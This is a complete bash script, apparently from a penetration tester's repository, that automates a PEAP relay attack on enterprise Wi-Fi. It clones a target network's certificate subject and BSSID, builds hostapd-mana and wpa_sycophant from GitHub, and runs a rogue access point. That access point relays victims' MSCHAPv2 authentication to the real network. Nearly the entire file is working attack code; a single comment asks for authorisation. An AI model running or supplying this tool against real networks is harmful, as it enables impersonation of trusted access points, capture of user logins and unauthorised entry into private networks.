Wifi easy PEAP relay
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
#
# Usage:
# wifi-relay.sh "TARGET-SSID"
#
# Run as root. Needs two wireless interfaces: one for the rogue AP
# (IFACE_ROGUEAP, default wlan0) and one for relaying to the real AP
# (IFACE_RELAY, default wlan1) — adjust the exports below to match your
# hardware. Only use against networks you are authorised to test.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to the
# Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
mkdir -p hostapd-mana && cd hostapd-mana
export IFACE_ROGUEAP='wlan0'
export IFACE_RELAY='wlan1'
export SSID="$1"
export BSSID='42:42:42:42:42:42'
export CHANNEL=6
export HW_MODE=g
export COUNTRY='FR'
export CERT_SUBJECT="/C=$COUNTRY/ST=France/L=Paris/O=xxx/OU=xxx/CN=xxx.org/[email protected]"
export DH_FILE="`pwd`/hostapd-mana.dh"
export EAP_USER="`pwd`/hostapd-mana.eap_user"
export CERT="`pwd`/hostapd-mana"
export PATH_HOSTAPD="`pwd`" # DO NOT TOUCH
# Print a framed status banner on stdout: an empty line, a rule of asterisks,
# "[*] <message>", and a closing rule.
# Arguments: $1 - message to display
prnt() {
  local rule='*******************************************************************************'
  printf '\n%s\n[*] %s\n%s\n' "$rule" "$1" "$rule"
}
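prnt 'Create certificate'
# DH parameters for hostapd's EAP server; generated once and reused.
[ ! -f "$DH_FILE" ] && openssl dhparam -out "$DH_FILE" 2048
if [ ! -f "$CERT.key" ] || [ ! -f "$CERT.crt" ]; then
  # First run: briefly act as a PEAP supplicant against the real network so
  # wpa_supplicant logs the RADIUS server's certificate subject and the BSSID
  # it tried to authenticate with. Both are reused to make the rogue AP look
  # like the real one. The throw-away credentials are expected to be rejected;
  # the server certificate is sent before the inner authentication anyway.
  cat <<EOD > "$PATH_HOSTAPD/wpa_supplicant.conf"
network={
ssid="$SSID"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
identity="xxx"
password="xxx"
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
}
EOD
  rfkill unblock all
  ifconfig "$IFACE_ROGUEAP" up
  # `timeout` terminates wpa_supplicant itself after 45 s. The original used
  # `cmd | tee log &` and killed $!, but $! of a pipeline is tee's PID, so
  # wpa_supplicant was only stopped indirectly (if at all) via SIGPIPE.
  timeout 45 wpa_supplicant -i "$IFACE_ROGUEAP" -c "$PATH_HOSTAPD/wpa_supplicant.conf" \
    | tee "$PATH_HOSTAPD/wpa_supplicant.log"

  # Subject of the first certificate wpa_supplicant reported. With a full
  # chain this is the highest-depth (CA) certificate rather than the server
  # certificate — filter on "depth=0" if the leaf is what you want to clone.
  SUBJECT="$(grep -E 'subject=' "$PATH_HOSTAPD/wpa_supplicant.log" | head -n1 | sed -E "s/.+subject='([^']+)'.+/\1/")"
  default_subject="$CERT_SUBJECT"
  if [ -n "$SUBJECT" ]; then
    # Country comes from the leading /C= component. Accept only a two-letter
    # code so a subject without /C= cannot turn a whole log line into the
    # value passed to `iw reg set` (the original sed returned the full line
    # on a non-match).
    if [[ "$SUBJECT" =~ ^/C=([A-Za-z]{2})(/|$) ]]; then
      export COUNTRY="${BASH_REMATCH[1]}"
    fi
    echo "$SUBJECT" > "$PATH_HOSTAPD/CERT_SUBJECT"
    echo "$COUNTRY" > "$PATH_HOSTAPD/COUNTRY"
    # Clone the captured subject onto the rogue server certificate. The
    # original saved it to CERT_SUBJECT but never used it for the cert.
    CERT_SUBJECT="$SUBJECT"
  fi

  # BSSID of the real AP. The rogue AP uses a nearby address: last octet + 15,
  # wrapped within one byte and zero-padded. The original computed
  # `hex((x+15)%255)` in Python, which is off by one on wrap and emits
  # single-digit octets ("...:f"), which hostapd rejects as a bssid.
  tmp_bssid="$(grep -E 'Trying to authenticate with' "$PATH_HOSTAPD/wpa_supplicant.log" | head -n1 | sed -E "s/.+Trying to authenticate with ([^ ]+).+/\1/")"
  if [[ "$tmp_bssid" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
    last_octet="${tmp_bssid##*:}"
    printf '%s:%02x\n' "${tmp_bssid%:*}" "$(( (16#$last_octet + 15) & 0xff ))" > "$PATH_HOSTAPD/BSSID"
  else
    # Leave an empty marker so the read-back below keeps the default BSSID.
    : > "$PATH_HOSTAPD/BSSID"
  fi

  # Self-signed RSA-2048 server certificate for the rogue EAP server. -nodes
  # writes the private key unencrypted (hostapd needs to read it at start),
  # so restrict it to the owner. A captured subject may contain escaping that
  # `-subj` does not accept; fall back to the default subject in that case.
  openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 \
      -keyout "$CERT.key" -out "$CERT.crt" -subj "$CERT_SUBJECT" \
    || openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 \
      -keyout "$CERT.key" -out "$CERT.crt" -subj "$default_subject"
  [ -f "$CERT.key" ] && chmod 600 "$CERT.key"
fi

# Re-read values derived on a previous run. Only well-formed values are
# accepted; anything else is reported and the defaults above stay in force.
if [ -s "$PATH_HOSTAPD/COUNTRY" ]; then
  saved_country="$(cat "$PATH_HOSTAPD/COUNTRY")"
  if [[ "$saved_country" =~ ^[A-Za-z]{2}$ ]]; then
    export COUNTRY="$saved_country"
  else
    echo "[!] Ignoring invalid saved country code: $saved_country" >&2
  fi
fi
if [ -s "$PATH_HOSTAPD/BSSID" ]; then
  saved_bssid="$(cat "$PATH_HOSTAPD/BSSID")"
  if [[ "$saved_bssid" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
    export BSSID="$saved_bssid"
  else
    echo "[!] Ignoring invalid saved BSSID: $saved_bssid" >&2
  fi
fi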
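# Apply the regulatory domain before bringing the AP up so the channel/power
# limits match the target country.
iw reg set "$COUNTRY"
if [ ! -f "$PATH_HOSTAPD/hostapd-mana" ] || [ ! -f "$PATH_HOSTAPD/hostapd-mana_cli" ]; then
  prnt 'Download hostapd-mana'
  # Supply-chain note: this fetches a pinned release tag over HTTPS but does
  # not verify a checksum or signature, and GitHub auto-generated archives are
  # not guaranteed to be byte-stable. Record a known sha256 of 2.6.5.zip and
  # check it here (or vendor the source) before building on an engagement host.
  wget https://github.com/sensepost/hostapd-mana/archive/2.6.5.zip || exit 1
  unzip 2.6.5.zip && rm 2.6.5.zip || exit 1
  cd hostapd-mana-2.6.5/hostapd/ || exit 1
  # Stop here on a failed build instead of continuing to a missing binary.
  make -j4 || exit 1
  mv hostapd "$PATH_HOSTAPD/hostapd-mana"
  mv hostapd_cli "$PATH_HOSTAPD/hostapd-mana_cli"
  cd "$PATH_HOSTAPD" || exit 1
  rm -rf hostapd-mana-2.6.5/
fi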
prnt 'Configure hostapd-mana'
# Write the rogue AP configuration from the exported variables. The built-in
# EAP server uses the self-signed cert/key and DH file generated above, and
# sycophant_dir is where state is exchanged with wpa_sycophant. PMF is off
# (ieee80211w=0) and TKIP is offered alongside CCMP — presumably to admit the
# widest range of clients; the eap_fast_* / pac_* values are the well-known
# hostapd-wpe defaults.
ctrl_iface_path="$(pwd)/hostapd-mana-ctrl_interface.run"
cat <<EOD > "$PATH_HOSTAPD/hostapd.conf"
mana_wpe=1
enable_sycophant=1
sycophant_dir=/tmp/
interface=$IFACE_ROGUEAP
ssid=$SSID
bssid=$BSSID
channel=$CHANNEL
hw_mode=$HW_MODE
ieee80211n=1
ieee80211ac=1
ieee80211w=0
ignore_broadcast_ssid=0
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
dtim_period=1
beacon_int=100
country_code=$COUNTRY
ctrl_interface=$ctrl_iface_path
ctrl_interface_group=0
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
macaddr_acl=0
# wpa ---
auth_algs=3
wpa=2
wpa_pairwise=TKIP CCMP
# eap ---
eap_user_file=$EAP_USER
eap_server=1
eap_fast_a_id=101112131415161718191a1b1c1d1e1f
eap_fast_a_id_info=hostapd-wpe
eap_fast_prov=3
ieee8021x=1
pac_key_lifetime=604800
pac_key_refresh_time=86400
pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
wpa_key_mgmt=WPA-EAP
dh_file=$DH_FILE
server_cert=$CERT.crt
private_key=$CERT.key
EOD
# EAP user database for hostapd-mana's integrated EAP server; the file's own
# header documents the format. The wildcard phase-1 entry accepts any outer
# identity, so any client that associates can start a PEAP/TTLS tunnel, and the
# fixed phase-2 "t*" users are the hostapd-wpe defaults.
cat <<EOD > "$EAP_USER"
# hostapd user database for integrated EAP server
# Each line must contain an identity, EAP method(s), and an optional password
# separated with whitespace (space or tab). The identity and password must be
# double quoted ("user"). Password can alternatively be stored as
# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
# that the plaintext password does not need to be included in the user file.
# Password hash is stored as hash:<16-octets of hex data> without quotation
# marks.
# [2] flag in the end of the line can be used to mark users for tunneled phase
# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
# identity can be used in the unencrypted phase 1 and the real user identity
# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
# access is needed, two user entries is needed, one for phase 1 and another
# with the same username for phase 2.
#
# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
# password option.
# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
# password.
# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
#
# * can be used as a wildcard to match any user identity. The main purposes for
# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
# avoid having to configure every certificate for EAP-TLS authentication. The
# first matching entry is selected, so * should be used as the last phase 1
# user entry.
#
# "prefix"* can be used to match the given prefix and anything after this. The
# main purpose for this is to be able to avoid EAP method negotiation when the
# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
# is only allowed for phase 1 identities.
#
# Multiple methods can be configured to make the authenticator try them one by
# one until the peer accepts one. The method names are separated with a
# comma (,).
#
# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
# version based on the Phase 1 identity. Without this flag, the EAP
# authenticator advertises the highest supported version and select the version
# based on the first PEAP packet from the supplicant.
#
# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
# Tunneled EAP methods are configured with standard EAP method name and [2]
# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
# hash
# Phase 1 users
* PEAP,TTLS,TLS,FAST
"t" GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 "t" [2]
# Phase 2 users
"t-md5" MD5 "password" [2]
"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2]
"t-gtc" GTC "password" [2]
EOD
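if [ ! -f "$PATH_HOSTAPD/wpa_supplicant/wpa_supplicant" ] || [ ! -f "$PATH_HOSTAPD/wpa_sycophant.sh" ]; then
  prnt 'Download wpa_sycophant'
  # Supply-chain note: pinned release over HTTPS, but no checksum or signature
  # check. Record a known sha256 of v1.0.zip and verify it here before trusting
  # the resulting binary on an engagement host.
  wget https://github.com/sensepost/wpa_sycophant/archive/v1.0.zip || exit 1
  unzip v1.0.zip || exit 1
  cd wpa_sycophant-1.0/wpa_supplicant/ || exit 1
  # Abort on a failed build rather than carrying on to a missing binary.
  make -j4 || exit 1
  mkdir -p "$PATH_HOSTAPD/wpa_supplicant/"
  mv wpa_supplicant "$PATH_HOSTAPD/wpa_supplicant/"
  mv ../wpa_sycophant.sh "$PATH_HOSTAPD/"
  cd "$PATH_HOSTAPD" || exit 1
  rm -rf v1.0.zip wpa_sycophant-1.0
fi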
prnt 'Configure wpa_sycophant'
# Supplicant configuration for the relay side. identity/anonymous_identity/
# password are left empty on purpose (the file says so): wpa_sycophant fills
# them in from the victim's PEAP exchange. bssid_blacklist stops the relay from
# associating with our own rogue AP.
cat <<EOD > "$PATH_HOSTAPD/wpa_sycophant.conf"
network={
ssid="$SSID"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=$BSSID
}
EOD
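(
  prnt 'Configure interfaces'
  rfkill unblock all && \
  ifconfig "$IFACE_ROGUEAP" up && \
  ifconfig "$IFACE_RELAY" up
) && (
  prnt 'Run exploit'
  # wpa_sycophant runs in its own xterm (so its output stays readable) and
  # relays over IFACE_RELAY; hostapd-mana runs in the foreground. The EXIT
  # trap tears the relay down when hostapd-mana stops (e.g. Ctrl-C) instead
  # of leaving it running in the background. Absolute paths are used so this
  # does not depend on the current directory still being PATH_HOSTAPD.
  xterm -e "$PATH_HOSTAPD/wpa_sycophant.sh" -c "$PATH_HOSTAPD/wpa_sycophant.conf" -i "$IFACE_RELAY" &
  sycophant_pid=$!
  trap 'kill "$sycophant_pid" 2>/dev/null' EXIT
  "$PATH_HOSTAPD/hostapd-mana" "$PATH_HOSTAPD/hostapd.conf"
)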